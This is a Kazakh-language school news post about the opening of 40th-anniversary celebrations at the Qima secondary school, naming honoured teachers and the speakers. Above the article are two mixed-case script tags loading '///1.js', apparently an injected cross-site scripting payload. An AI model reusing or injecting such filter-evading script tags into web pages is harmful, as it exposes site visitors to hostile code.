<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.02.2017

Мерей тойдың салтанатты ашылуы

7-ақпан күні Ғ.Әбдірахманұлы атындағы Қима орта мектебінде мектептің 40 жылдығына арналған шаралардың ашылуы өткізілді.

Салтанатты безендіру, көңілді әуен - жақсы көңіл-күй сыйлаудың алғашқы баспалдағы болғандай. Мектептің 40-ншы түлектері еңбек жолын сүйікті мектебіне арнаған қызметкерлерді: физика пәнінің мұғалімі Оразбаева Багила Мукашевна, мектепалды тобының тәрбиешісі Сулейменова Роза Аягановна, технология пәнінің мұғалімі Турлыбекова Тлектес Кабиденовна, іс жүргізуші Курсаубаева Майра Өмірбайқызы, бастауыш сыныбының мұғалімі Аширханова Ботагоз Қуанышпаевна, информатика пәнінінң мұғалімі Идрисов Ерлан Калиевич, директордың тәрбие жөніндегі орынбасары Омарова Асемгуль Бакировна, лаборант Каирбеков Бағдат Есілбаевич, дене шынықтыру пәнінің мұғалімі Аширханов Даулет Рамазанович, орыс тілі пәнінің мұғалімі Махатова Жадыра Ануарбековна, тарих пәнінің мұғалімі Ерік Қабижан Зейнелқабиденұлы, педагог-психолог Турдахунова Айнұр Қайроллаевнаны мерейтоймен құттықтап, алтын әріппен жазылған естеліктерін тарту етті.

Мереке мектеп директоры Мейрамова Гүлсім Жұмағалиқызының құттықтау сөзімен ашылып, ұлағатты ұстаз – Усембаева Майра Жетпісбайқызының сөзімен жалғасты.

Ұстаз-түлектер өткен күндерін естеріне алып, мектеп өмірінде болған қызықты оқиғаларымен бөлісіп, балалық шақтарына саяхат жасап, өнерлерін ортаға салды.

Мереке соңында түлектер атынан сыйлық табыс етіліп, жиналған қауымға тамаша мезеттер тарту етілді.

Просмотров: 570


Пікір қосу



Деректерді қолтаңбаға қосу